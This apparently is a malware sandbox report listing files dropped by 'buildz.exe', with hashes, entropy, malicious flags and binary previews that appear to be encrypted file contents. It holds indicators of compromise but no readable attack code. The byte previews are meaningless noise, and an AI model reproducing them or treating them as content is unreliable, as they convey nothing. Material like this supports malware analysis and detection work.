                        SHA-512:A9C9D706EE69199AC79139F78BE5E4B15CA3CA6D27382864971D88004B480C54F6DA93C18AAEBF6A433AD2D89B966660AEB436B68FDD7002AC242541E08D51D5
                        Malicious:false
                        Preview:(()=>.._..|.*..8f....).K..j.P....!?..e8.?..`w.._....3.C.V.X.H.!..Fe.~.KRb..k...!j......L.....}....k0.............\.....F...sXx.x.W..C.g..o.N..!../4.BJ-.....f....o:..4..5..1.2...a2......v...o5>.a.....H.Rp...17X..e.X.....o.. ..!.....Q.... . I........zT.Z$..........G....?.......9..3u.z...n}.0L..d...(..X...5.....$.e.&...5^P..P< ..K.pS....K.g+KI.o.n.....k.$......Q.m.@.o..XD\..k0...o...s._Ib0h.c.N.h.1^..<R....R....[."..:y....1*U...w...Q.......F.. ..&2.O...{..V..o.b.h.....?....6...........C'...z.C?..U.I.P.9u!...9.HG..r..t9Gly...m....+..<......].!`.../.#....RWZ.<...2D...n...~.0..s....; ...y..t...!H....*.....z..O......e....~l........../.x._7..b.7...x.....c"..kd.....4.......T.......5^(.en.a.8.>....>.{Y9.kv.B7pY.....x...0K....&&.#E...9H/..O.3....#......&.V...~...8.E.g.q'7j...`-.'!.a.Z...U.......f.......S...fw5..74^f+..VU}Vg.|......R......`...4.......z.U...W...%m..VP.._..... .s.....q..k..vB.`./?..u.n?q)..lK.....2....j.x.^dP....JP...?.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1316574
                        Entropy (8bit):6.252296576720078
                        Encrypted:false
                        SSDEEP:24576:6sdYg7p7dM3XW2/c66UwVToLNoX62rgGOs4zUg2oGiNvB+n8aW8Wmf8jTw3AN6q3:7Yg5dM3XW2/c66UwVToLNoX62rgGOs4N
                        MD5:5541946539E88EB805C1B5E36EFCD7EF
                        SHA1:5269984B3DF333D89B3856285E8F19784FB1A148
                        SHA-256:C49FE2A9CC79D0BFC7FD192F607368E2F472E8E98F3F957B689CCCB41A8C3E9B
                        SHA-512:8604A6E203CB0ECAE6404A31063DA21FEFABEB906D24BB5BA59AA39AF7962017C052D60848787F9EA15685BCC2901CEE3EB4AEE0693ECBC8DEEFC3ECB32D6219
                        Malicious:false
                        Preview:(()=>I.N....@...%60.rl~........f...`.]%.!oc].CW,..pK5..3X...M.3.8.....TX...s.(W...n......#AF.e...H...4F>tE.;.....z.dD....;....g.......r.9.']_......_.....X....qp.f.U.....{;$c`@...|.m)..)..b...Vo1._`.#...z.7x{j..........i..3.3......f.u...K.@...t.B)......EG`..GJ.. =....+.z..v.W....._......a1P...`-.\.X..F@.5..e?.k%.....E.!..m..q.dC..bJX..4_.T.=.B.@5..E...|!P3^...%.q]6:.z.!H....CXb..j..r...&.>.8P%.$..H..g..T7.R..{...M.....!j.M .......o.p.x.s.s..IpR....W.=...p..[...v\z.O.&.n.H..j.....Q+...K.TC'.pWW.;.w..|......<...q..#..+#6.]N%.YM.6`..S.51k..{H!..Y|.c..l.%]..d[...g)4xU[;.K:...:.V.n....^uL.K6......6..y.L.`.........r..<@..GO....*..\d&:.M ..<..b....(Ie.@..o.b4...'.!....k.A.rZ.@5......)e../Q../.....M....e.\I.{.;K,..]...C...H.T.Q)a....g.&f......"/....".K..f.S..../. >.(.\.....H*.P|......g.........!..J.2"BK..s...`..4.[/....<Es...Y......G.......=.d.{.$.r.:4Ma#........I..H....G...+....p........Q'.W.^C.|-DO.K,....m.6[....s....r.Z..%L;..%p...aay..C!.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):52139
                        Entropy (8bit):7.996448790548066
                        Encrypted:true
                        SSDEEP:1536:Ttt+SDrUjUoTfHcI+hfAMMqiqYOsAdSZdLeMJl0A:THnbeUVWUiHX0A
                        MD5:09EC39DACB8ABF593DED8A026C9B3023
                        SHA1:5BB24F554B852FC269C427378B1427E374084881
                        SHA-256:9470C71D7119014422160CBD7B0E312DD1574C82D80F799DE4BE6463F3D15C6B
                        SHA-512:A12822C68121FBE012BB2BC1540EA2A9FF9521D596B048BB7935F404DDE15F8724B5BA004B323C2ECEE8F1D31B6162F0F77F112304C1EB978962AA0C79100634
                        Malicious:true
                        Preview:(()=>.1%`..+.y.^.>.p .(.e+.M.eu\S....dV..7....).B..c>......U...p.;....$U..c( .q...]..:.%....'`....a..Ge.._E.$.V.L. \.#`..._.8....c.6.2....v..y}.r....:(.&cad|r6.>..y.... ..V........1..W....$].oK..s..wKL.R...Ff....T.1to.G...|..kW'...w.#..n. ...../.EL;. ..HA.MU.....b..<.E.g.}......@.]..V..Z.uA.....O...o.,..\...`.JZ...+..........F..[....W.....f...W.K.....A....t..K.@..OP.#(..E.(..]...&-7\.A..Oo....g..i.....-.Xv...u..I......#[M.5u....fS...>.?..Tb... ..Z....-u....%.;4....%....Q6....".....[.C6s.....>.r...@..P.{........A....y.4o.X+R~.8?-.....9..Z..u.+..t.|..4...p....9.(..~.._..A......!3v..)..oA.....R..Y...(..a^......>.... ..Y.k..q_C..2.8.$..2..l...#%q.L........qyP..-....>.Xz..#........$...O...wRs!.t.u....7.T.>...-@...{uoo..k.l1.....n[F\s.O.\.Qr43..&Ms<*.b5.........w..Y.)F....G...W......t.6<.*.$...xovH...Z.....?S. .hL........D.,Y:U....BH7g.)..24n..].N....!4d....~A&=pr......ho.. .Z...cc.\w*.6H..+q.M...T..H4o....0.(......0...;h$.PJ..d NI.!.6.u......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400
                        Entropy (8bit):7.288521145098095
                        Encrypted:false
                        SSDEEP:12:dJssR8Lrab9YENGMzj8E6/CfXNFT5T426Gcii9a:dLRa+fsMzj8T/Cf9t5uGbD
                        MD5:4ECABF3DDD0153AD4998FF877A827231
                        SHA1:7656B634A79B1DEB9E510BA3DA3C6BD86E86F821
                        SHA-256:409CFCF5C066A4ABA6A3AE9ED6E7CD9F8EFDE05A6224765043A4904BAC921E78
                        SHA-512:F41568E5ABF6A892B75B18D5FC92931F8B69F220AF6D595C9DBC54330D79BFE5A731DE5BDCE1BC579E6094EECC6689F9D7108381A370ECC15699884392D87C78
                        Malicious:false
                        Preview:1.5EC4.....u..V.s.!..^.]=...o....dX ..(n...F.<....ib..'..Z[.u.Yn_p..........F.M.....t.A.7pfxB.......Wq..#WQ.h...O.`.A.~.Au.@9xn.I..jH.W{......Y.R.mL.\.Q.......~...B..Em... .E"}|.'...R.g..#..o."z.@....2.<y.{-....k.A..#..i..]u..w7..oY.."..#d.{P..hsj......{q.X.z.Rj.W.\.1h.E...B........{...u.4!Q......]..4n..M...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):481
                        Entropy (8bit):7.5829555142751035
                        Encrypted:false
                        SSDEEP:12:MxBohYjVegClIwS0HlCQzere4TwHMvY1jcRF26Gcii9a:MXoKjVegCDSaM9e4ksQ1jcRRGbD
                        MD5:A50F82CE3B8ACE2F929741263A56C086
                        SHA1:9B785B424C74045608A41FB4DDF2A7633E627374
                        SHA-256:9D4EA018CD09F94A8DDEC90D0632290F43FAC6B08AFB88B0330F3E6C0E958795
                        SHA-512:5A75827DBD72ACEBFFC1321BF5667A57165B1EAE37FB54CAD08E88078E765C5F5DEEA690FB56388825358D5A6091A80C015103829C323E72BDA3A7AB4113CA21
                        Malicious:false
                        Preview:.{..:5.u$ja^...`5...x....'.V-..x..........?.z.J@W....q..Y..&.%..#U...IYt..........M...e.<G.c...l.&.D...C.bm...S.X].S.$._..i.vQv.e%..........&.@..._|7..Z..A....*.....j.....[..\.B."Z+I...W"#N`G.7t.....R}.0.a..!.&D..5.,...X\4...".[/<`....p>.Y..s.)R.X..}bW.T.D.....I.z.....0=.Y...(...pw...$^.^..'.....Q].._?....Z....V.h-...<.z4..?.P...>...~../M....r...!Y.N... aDx..........(ylaN.7b.fEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):777261
                        Entropy (8bit):6.552513379029845
                        Encrypted:false
                        SSDEEP:12288:sULHrnXWgfMzrSm8TcX41ahYSWW26ejCSny5IHve2ReLUpmosaaqinFrP/pQ8yBS:XnXWgkum8AXS5JW26ejCn5IHv/Rzpmoc
                        MD5:38EDE86A64DB8E90063519C8195D70B8
                        SHA1:5D66D1B6F0211851BE17D877116499A10DCD8075
                        SHA-256:3262EF58811477A256B2B12AAB9ECCA06522570B3086D3EFE66BF7706E78B214
                        SHA-512:1992DFAFF9DEC67E8973E310EAEAC1BEBBA53969DB4A4C7E3593D11D5A2766D4C41FBE27499434F9FBF323C6C483D268445DEFC6BABFD0211F456C6AA65AFEEA
                        Malicious:false
                        Preview:(()=>.T>\..k...DC... .>../.PQ...${.;.h.........B~.UxRi...9.......d3......Y..e.w.2e..t?'.]9...W.>V..x)..li.g..q....G.+.Ai7Rt..y.Hi.x...=....h.@t$G......&.....B.......*q.a.k...F......R%_..7.B.G..S{J...^..h._[.jK,../..VB9.....W....@.q..(..A.*...g....^..........%-........b*u..~.}Qa...HC_..k..i.....I.#...............B...!bq.;..^..d..{.{..............N.... .a0......;........X.me.....ji.P..>.y..K*.....w}`..l...@c.......W...B....p!.H......9].}.._....Y%..T../..s.....g.rZ.....?/o8w..EF6........o.G...2[.uG^.k.lxh..n.~"..tt.8..=Gr..,.H..H.d..(e.`...|/.C9...;.u.gp.s`J.......BH.EX1....&3!...\.....5.......=[.*...H.}8a..q...&.BK.Q....S..]Clh.L...U.u...+.Y..v.Fo-....~@...... ..x....w'nv+..K./...?.ab..J..n....3...J..q.{E.8..y.,......i@......i]....ME.....?.0.....(......s..+Pd..$.-....e:u/..I.".....NGP^-Z.j..[.1.....`..~;4L..+....L...g).K.P.jP...i_.z. ......`^..k.Hy.Qp.6.).K v..;.K.w....Z...l.=V...$HM.o.1.......V.YK#....._.h.+)<....1........<6.hG.T=z.&>l......d7X`.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1679
                        Entropy (8bit):7.86703623960285
                        Encrypted:false
                        SSDEEP:48:fIGBpH184CGnFxb7+S0UHApLDDxYtEiFSUD:gspH184Cgv+S0Ua5Y1oA
                        MD5:12D998A32957190238FD9AB13369C5FC
                        SHA1:61797B58CA09AABF07B84C44D3E332A81DACDA03
                        SHA-256:AE543627FE09D81854E8F06210384CF284C689428A55422C4B83C2DD50087628
                        SHA-512:499FA3CE98355BB0637D644FEACC5E153E0C0CB242DBABC9E9AE48C0FD3DF87E3256B7DB1BEEBFD618F838E2FA360CCD549B25DFA8E40F32764B7C42C1E5CF42
                        Malicious:false
                        Preview:<html.5.o..g.V.....X.B....^...F...D'...k~.....q..5..W.I.M...Q. .7V.R......H.[..*`.~..Ko.........A,S...:9..77Y...Y.o.z"TS.~x?....H\.O...p...u..|,+.68.c}&..a..;c$.&..:w.....?+W....SK. ..._.@N.(....>..b*6..&.{...qk........<......%..@]..)|.@.........%..$...e.}.^.p.{...c...Gc|.{px...A{.).S..'..0......".9.......R,t%.....[r.v..W....^^..X.B..M.46L...V[9."Gn.N.KY@.,_\..^.u9B6.2Y..<U$.].{.}p&...6..i.....t.8zLf..2..Hp......$...[.LEh.].>..Q.'87.ZJK..[. = .>:3..G......mR-..?..'...".Q.......|.5P.9a..s.*.=l.....d......er..{.UL.q.$ZlE....;urY...$.W*]...~.2In./.\VRj.............`4.o`d8.f..5.o.X..'V....>;"^.P.@>....`....6...."......]n...g...k%.J..F...z-q.......... IQ.hKF.G9H.q.H....Y...a....].":.z-.......#.....Y?^Y......+1..a|$E.......Zy8.8..N...hE.e:L._.4h..B....lH{..-. ..I...n...j...`..)~3...yA.4q.L4..-.P.t..`@...C..AA...z._7$#6a.m...C.YD$...;I.;64n...N...7..X.y.yad....!....w..\..;.....{ED.gV4}.E`.....K|m..I...."6...B&*..W&:....<.|....L.G....E........u$n...l>,..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4988956
                        Entropy (8bit):5.713700091212814
                        Encrypted:false
                        SSDEEP:49152:vP9KHiCbgr0I8ruVWgtJylhTd2fsZjVZLl7gJOoAgGJ3DA5dOrPyCuiJ4zPLHpsf:v2ePa4I
                        MD5:C43C4F3B3458445E66F8A09E4B6248DC
                        SHA1:DA912CCBB14957A7E5FDF231A9E536EC5A1D21A3
                        SHA-256:D7EDEBCEEC7A4A2B5254488E9993B5784F52B9B71E6FCE139DED48033FFE47B4
                        SHA-512:670F4ECF070DE5E1B03F9D63E54384EF4ED30652E8A637FDDBFE943C017772571FB16A5CA0078A0BA3B1623FCB3A3A3471B6F4601D75FB6F62D1CE99EF354251
                        Malicious:false
                        Preview:/*! F.R..k............T.FKL.$.pO....\.[...........=5O....Ba.H1g$..8.g.j....l.(aS....s...r..n R.!.....4..?..182u...D..k.q,~.$.....V..>..Q...Kh..1.tT....T.......0M.\K.zT.'..O..I.].*]0...XxE=.N...%_oX\....1.,.@I.....8.Vl...a........*~..../O.....O.K.M.....C.%....^f.9.Fn..l.E...#9.......m..bLz^...|u.+&..QA..L.5....-qP`v%.m...).AK....'..<.'d.Z......I...(dq..^o.a.\V.....B=.. ..=}.H..?...x..I#.....#..at.....j..H.rF.H!.....0..C$.....;o.*.Uh..;.g....o)s...u.+...^...._...........7!...F.u../....Q~.\.R...q..D-.~.... 6.a..G.k..P.M...>.,.t.u...e.M...=s.I......Q.I.<......=....-\.s.`QI....;n...k.q..N."#..A...]=...........7n.>....[.rq|.......T.M.\4,.,.|\..i..9.T..>....W.../k.`.0Lq#EL....K.(..F.yA.cZ.;.&.=.W.3"M..u...F.3.K....N.......Z>...o.#..U..{rl.].6...4.....AK..Mk.+..%eN...{...6S.......:.........4.u...@......F.`.a...*.0....O....t....v..7...X!@.........s........<.O.wL".W.y..l..]z..d.........i..n...`.8.....C+.&..vC.s..R..@.Iu.. ..R..$.[.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1473
                        Entropy (8bit):7.852678805055671
                        Encrypted:false
                        SSDEEP:24:OShYey/fMzhJ32aH18n/z+Ait3sOoZT0rTyPK3Sy+jUfhMH5h6NqrcliHDHGbD:OwY33Mzv32aAr+ft3Dp3yPrXjUsmNqwF
                        MD5:506DE7703BF43144EC6B0AB8E1868C68
                        SHA1:D8BF4BBA55BFA049A1A2554ABAAB870868DF1AF7
                        SHA-256:EC6FAEBE9F96E46F7B9EB28FDEC915CB6513F9D12A266410DC6BEBC729C7A633
                        SHA-512:737A85224A85601A6A7F4FA65758A40B745096DE2BFE1DFD6E41A444E025DC2DC661A580DB418C86FD09A01DD0CD490FBF370AE8D7671B5970BDB8465038B347
                        Malicious:false
                        Preview:<html....b....~...^......_....X.`R..A.e.......U.g..2lR.....N)..>...u<e..E&\.{...1..v....H}..?."....@..b..jI..;2|...P.h...7.M\.C...mk.F^..PXtl.....i.\e.2x7..[n...f.....1....}C.t.Z.f."\..=U...!._..6........... .%....C.}x_.Y.?5..B+.....O.....eQ.S_.......X.}.......qep*..ve.+...yB...?.%.....W.... .J...E.(...$E....%fC....D.wS.....Ra.V....fT.fs...b....92s..>0<...Y..z..kQ.em....Q...b...l.D'..8..0.-....ms7l*V85.>...C.F.e.zrar..=..]......!`..S%.,.Iv^lx5.k*....%..... .........+..=a..1b..|....)v?..m.Wt@.*..fd..m.V..oC.I......"......2......l.dy.r......mk..Z..E...I|.v.(....U.u..u..bo...^..z>1.97.*U.EWi.9...@..}.q.V.._R...em..p......<>....b..L.~DD.v.....V...m>z.....T.=. ..9.Mz.T..x.s..;.........FMu..wW..Hp.....U.[...2...e......2.&.[.(iNO....,......g..P...o."..$E..x.....uq^.....O.nx.m....p..m.^.....y.?.. n..T.'..P.T...1X.t.'.U.S.du..!b.O>7..G.............2.b.DP.W...._.a...`kM.|W.....?.2NK....U4Y...@_t f.qg.o...<.J.....2/:...N*9i$P..ru.;.....G#..|.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12270
                        Entropy (8bit):7.984029592024994
                        Encrypted:false
                        SSDEEP:192:/erwOK0N0NUycllJ4R2aiktXmBQsKkjSj0oO/s4El2WADwpqXzSJnW6rGV4XWNDJ:+bZG3SobtXOKkjSj0rs4EwJDwqDWW6rA
                        MD5:CF57481054A165AAF7925C96C010E209
                        SHA1:59C2E4B7C00F8457CA5702B19AE63F41E1688365
                        SHA-256:CFCF0D34B1F0680125C4962CA6E6805CCA98246403C33495FF25F141824B5203
                        SHA-512:0C0353506F20EC72DF81CFCB06AF4010DBBDF8E6C5E91C8EAE745633CD07AE46F11F81DADF305BDEB865E3752F280D3FD1AAD2CC53AA5AB089C11464FAF7F7DA
                        Malicious:false
                        Preview:(()=>...;.oa9.$P..U..w..Vu:..X. ...}ZQ.!...=.0..o.#x..o....2...UyM.%.%Os...Q.@tp.$.+H.S._..p.I$..T...C....!...i..U.&.&.....;.R.2.,.B.U@.`x....'.g.Hm...*L:..o..$........h8. ...../u.$.PeF...u....O..]..M".Pv.Y...~..X.3.N.7.F.e..^......}...M`.u...4.x...Q.Dq..)_......G.d"e....R,x\..1....S..w!.8......%.3/+.6..)^..<.....v...y..(.^.X...P..M..X%"U...5Pk..v:...b..Q.}.."k...R.........J=1...,..]....)...X..........q?BtB.a....qT.....:.s....O...W.l.O.........Y.tz....N9..]b.'...sW....O..z.%.,NO@...o$%....k..ZN\..Q3.}.......2..j.e..^..."r.=MS?I.k..C.T<:..>.Y\%.........Bc.m../.qK....x..".I~...9....jE.{.<d.U....~.....bt*..B....u..dMY...2.........?...C.W4.)..t...,.1=r....%.Cj)....T...gR..R.hp....K...J..|.0d...U.).../.kd.d..t"......|...i."c4.&...~.7....../j.+.._b..M....K6a..*r2.....B.sB>.O...=.0.t.P%..4..|p.O..m.v'>4.-....&C....j...).b{...86.,....{^.#:$..5......b.v....N..'.Q....@U.....s.PJ.H|14..yt..|0...?Q.M.nP..-5R.M\.x.p.....U...C....4n.N}.2V"...j'@.........v.s
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):358109
                        Entropy (8bit):7.385171962447083
                        Encrypted:false
                        SSDEEP:6144:g4inXNHS28DPP4UmuP7BeOZpGde/tEOqtFS4pc8Yv7fX7cxbAB0uc:gjn9M7PfGk/GsHIzb
                        MD5:4A81DE6C5D7E08076D2C00FE0B481F16
                        SHA1:12B742C56EF7DE39AA9D3CF9E849BEBC07AD5110
                        SHA-256:B2CB7D694ACF849296877BC3D2D6CCD7725EBA97C47BBDE20B07A71F9FE29AAD
                        SHA-512:EF14A6CF1328EB95214BE41AA0D6F32FE5079193B0AC4258FDD09283718D5EA0BBF7FF6F7B6AF86D4F295760F8274B647414F5104A8210379920740A00D03B10
                        Malicious:false
                        Preview:!func.....oX1.-...hU....f........0~........0?.*..=A5.E.B.).[.{X....<..f.r..X0..J.s....O`....Y9,1.....#0.s./.97.).S..?a..:..,..3.y|W...:..8|Kt.{C.ZJ.Ta........A.~....,....:..T#....$ .h%O.G......r..W....?.q$.(Rw......or2.oxK.Zs..}.....6._......-..z{nL.i..c..(.[.(...j._.E.{.fE.`...Z"h./...B...D[.c.j}..m..c..T...(..6..c...`..g..]%~.U...1R..'..av..~}...QS..>.% j..m^t...Ya...|.HY.h....='S.".Xl.....{.TYO....s[.N./..,.....].nL4....f..m..~... ..A....."..zqU.O5.D..4..)^U6.\....PJx...(.......c...W^.D.H4#.T..54.~.C.c#c.'[...../VM..T..C...b..cBy..K!.#.b ..y.?....R........eg.......4...V4R.(g...a.x...]..o+..(....#..{:ser..K.O.&.d..=..7.[.C....Z.a...|.....g.w...r.F8..Q5..c...`.O.=\zjP<DL.W....y.wQ3..T.../..k...+.rR|..d..X...[...#....9Y....(5....p...m.>...I{&w....#..3.......Y...M*......8...6:..8...<.6 6.8..cg...".n.+.c..F.q.)..z.~ XGAE{CkU.s5.c...24..).f!.|}.....Y\.&d._7%U......0!5..\.G..........@i].K.'...xO....4.8.Y..0...|.2....Z..0S.#...&..UM.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1179282
                        Entropy (8bit):6.260576881407313
                        Encrypted:false
                        SSDEEP:12288:1F6Ad9A9ewKNPzK856sJmOBjn2LT8/XH6rewfkb3J0sIY:1F6h9r4PVcamOB6LT8/bR3esIY
                        MD5:4607DF416E0A4712089BBFFEEC036067
                        SHA1:E3678B0FD959DA4D9645ED76036B223AC9DC5143
                        SHA-256:67106BFD912311E85516A3C84CC63854E1F9FDECE088F9BFC8D7041D8A26F051
                        SHA-512:0D0C2AE5C6AEE6DE09AF6653F27EFACFC14D8598E52010970FD2FEC905116D12BB960C10C8B3A5E16E0A63DCDF9D53504267638CA926BF820343D1E420211144
                        Malicious:false
                        Preview:/*! F..+...`4P..B1..Y...$lIs[.tz..A.e.......c=....@y.....m.L4=...p......._.=...~^`LBe.J...7....P(....Hr.L.0.....O...h...^=.o.W`u.....+.#.Z..,!..)....N...9`R.{./..A.:.......$a=..u1.i....$X..F./.}Z.h.M.1'.'?.A..^....t;...4.....Y......\.....\+s..q.......B..BsRP.....N..Wl'z.}...>.Yp.T..qD0z..l...b.-.X....jQWZ.{}#.gA.\....wi.B.{...Y.P^].>z}..8`.y.#~..1...2.A{.5w&~.*....}{.2.M.5..1.A........N.....'8(.*..>..w@}C..T..k.W.......7.6(..._M.{>.....8o!..<.h .......Mk...QAJ...........[.>.|../..s.F.5.\".So....k2p .U.{]G>..../Z..Q.....G#.....x....E.sG._C...*j.Y]...zv...QCm.....b.R...H.g.N.8.8...G$....F.fmH.......>{~._.C`B..I.}F.....T..6.\C.\.f.....4,qc...%...0...&.q].)~.z.u..F.......U)M.Kk.$...)V...f....7.......i+:.z/....~V"$g...GP-.]._..x.FN...f..~T.)...:...z....p..o...R......;.n...G......[....y.......N2.............m|.^....O%S.c.n.....u..SBQ...?.C......S..,.{.g.&...].cj.?..t....%D...&|..Fh.\...9.;.?..+.:......p..f....n...K......K...h
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1010732
                        Entropy (8bit):6.359016490517147
                        Encrypted:false
                        SSDEEP:12288:h+ZLuiWVvuHJwEL9X2Y+zWZdnwijDWwMxdf6kp:riyvuHtRmY+zWZWijDWF6m
                        MD5:6DB7268768CB7664150D651B66F1BEE8
                        SHA1:6C28F84419C3BEB176DA1E7FBA025B0ED10C0014
                        SHA-256:C8B6353FF79201A7FA8F87BFDF513E49B01738D5144327B1B202F1B1DBEE3E9E
                        SHA-512:CB8FEE4D0DF0BEB382DC22C13865834BFCB0D0B6E16B67C9F0D124D22B1143A484BBD3CD8128508132294C4EAF01738749F90C1FB14A412FE905F91FF9A1E5F7
                        Malicious:false
                        Preview:/*! F,...f..Exp.Qn.....f{..{9~.q3..Vr....!e.g.......;4.i.._+.9..qh.x....x..#).j.S[...8....`..s9^.+."....z..e.S.....+sS.u .k.d=..J...5P.2g7...>B.C...._.......E.Q.X.c~.y.Y..2.6..y^b.Z.j..35Z....L...).]U...0..O.6.kb.b...$..?.].2.S...........u.{.~...aK_/=.A..X... .1.N....W....6.}f!G:+9..m&....U..d.U$...>@......%.d.-S>&...L_<........v.Uw=.K_/VK;!..!...%..q...B..C^.[.pQ"..].#..b.-......l.....m.R{|v......9P...<.=....{..e$%.H...R....}ut.r...Yj>.G?....n....p.A.\.tC...1....../...%m..ck....#...Y..k...j.z..e.#....635.o.%.S...~.l....a..[..C..U.IR.W.e<C.F.....&..O. ..\?..m8FL....Y6..G..QrBv..&lJ....dG...k.u;.......^.8..9.(.......o....0...+...>.(...{.vGvd..VlT.N..$Y.+[..__......e..m.;.4.........xXok.3...d.(....*Z...[.i.R.Rr.......T..>.p.I.x...%..kt.../..l.YnIK..s.xc.#.....p.(W.~....h.5p[..e.m.*I..9......<.nJ9..yS.<nl...}......a.0.\].M....h#..<.*I'....j&..>6..wB.+...;D......,....UD..R.....t..<....._..a.......*.(...,.v2..i.xo..wW.:..U.a...a.:#.X..3.].~.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1042237
                        Entropy (8bit):6.337795667315826
                        Encrypted:false
                        SSDEEP:12288:rcHA2iQc2haZuQL4ThHr9QLhbGoHVMunRZm91a9I2SFn4ay:ShYIQt6oH2SZm91jFc
                        MD5:06C52FC5B620AA0F4C84594571E654FE
                        SHA1:0B72560E1C3A4E9C0D5BD9E27BB2F0DAD4A9EF86
                        SHA-256:033ED51D012C06E97C80FC92CA23271991C0C899E718AE53C29C03197C2E8732
                        SHA-512:D3376F26D0C03C84314A1642DB3283D5760458141CF800F33AC42E051BD578DC630CD20EB77A0BE1D73886316AAE04CF93BAC964EA026DCAFF30BF832E3B2F37
                        Malicious:false
                        Preview:/*! F..9...%:p.5%l./..4&...D.>._..*.q..........<.8.i..... .;9...d..4...-@...Sn.L.l7..6=........I....d'[...,......'....A:..~.....!....&g.P...W..x.....m..mytt:...V.@..k....m....E....B.|_.(N..c..,jN.U.ra......l{.U.cXi..(........i.X..O..........t~8.........C@.yE..1gLT../...Wo5...@2.W.....EU*...E.=...66...}......f...Q.k.`P.2.>..*(.DA./.o=....5....oM`kpdG....D....K...V..-(@H..E.....!...K..e7..u..?R1....=a.R.y[$u0A@.KQR...O.....<.t..0.y~..x*.I.J........s..vj..*q..~GO...E..).v....[,o.,.;.t..5..0Cwl.^xv.^......{....VnX..i...I...L.8.<[...ds..C.<.+.+.:A..f2b.*.C.L.).NL.W.8..(.k6M...#..t.*.......-@.7...(.q...\rr2..?.,...........q..T.y...@ *`d!..tv\..Lz.. v..a...C..|.)ja.z......`6.X?.9.....+.v...n.=3j... .=......g.T/.<v............`v-..A.&9...+)...ZRW......T..;0q....=Pn.c...{.q'.V.#.$..N.,3.....z..w......kx.........3.,-%.M.Q...A..p...........@#u.d........RHN.{....#.....<tY"!...V..A.E.W..6..~..B......}.*..%....UR1.<...WS/<..1V.L..".5.H4+...........g+..(...}H
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1681049
                        Entropy (8bit):6.110449401889666
                        Encrypted:false
                        SSDEEP:24576:0r6E1LYkVrB6WpJHdeL4rULhIvRbMwvoutont:glhYkVrB6WpJHdVrULhIvRbMwvouO
                        MD5:66E2B7012F953ED7D893D9FD8A348C56
                        SHA1:FB333BAF119E10E4B65C13B6894DCBFC6F052848
                        SHA-256:085992A545DEB6A762D0F40BE8B34DF424184BA2402DFDD6F43B8617AB0B0758
                        SHA-512:5D043737E51076494467BB94BF30A4E92A41BDAC309795F207DC4F1AB8054B561C012FC403F631EB164FF76168565980E053282AB68AB354EF2682E1BEA7AF24
                        Malicious:false
                        Preview:/*! F"D2..=..Z.%P.F..:.*.....n.....7BS.T......l..*h../....\......g.Z'.-.*.t...k..y...$vh.......\.k..\.........s..\..r..qOl......=..c"..!.2B..}..hZ).....n...v..=q.Z(o_<..M.+.X.S...3i ..U.y[.s*.........0..I....x.Q...OXE.a+M..vbx.c.....e'.M...mL.X^..QG..'.f...+.G..A.wY...3.. ~.v..l5}..0................;%7]....Q.^F.s).q..4,.]..S....1..N..m.Rh.l..g..b&G&..*.A..%.Q.Ok..$..w.|j......?.%.....^=..;b....6~.Tz...2..}...*..|49....P.e...L.*.wQ,.+.Q....Nl.)....rSM...e.4.c.(....to6@xG(..._..%.>.../Tb.:m..._@..a.A.#wE.s...%.3..{.h.,..P....$....t...]s.A...X...ytB.&.^...?.G. ..GY...fS..,...D.UD.[.L......u_N[.@u..m.Wc].4Jv...<l..g#,k....l...E..^...@..."..w.hS..\9....b...b.{..E.G."&m...#...|q.|i........ ..pd.\.Y3`.E....r....`Tk.E.A.G{.^A..k.x.`mN.~E..U.p.62.........C.i..T.?=..Y\."..T.n..ai.Hf......JY.....%....J_....W.8L.i...pa0&.A....{..zW.....17Q.......K.."...o..H.i..5..Q....<..m.d.o.x..r=....q3O.&.........6].4.L..J<6...Q.......S..=..#~.O.F...L.T.*L...,~
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):80121
                        Entropy (8bit):7.9978996124652015
                        Encrypted:true
                        SSDEEP:1536:VzZxy56cXLqxz1M8Jv0i1MiP5Drfn9kxV24M1VHkDyCoUQbA:hXy5PXLqPVJT1Mihnf9WVfN1QbA
                        MD5:0D26280DD6F1082F12A8FB8789D36328
                        SHA1:81A4660CE03185832633C3819A3647AE51E182BC
                        SHA-256:862209040D3C058629874948E8B835A81802EE800FC904F3D22E89DA7B05C3CB
                        SHA-512:E9A8D414C4B09D8DE3AA07B3C223D7657872107137B33E27CF7EE43A3D507AEF68570EE41C605B8850D9A0AEBF42E9003BC35743A0636623981F73202946FD62
                        Malicious:true
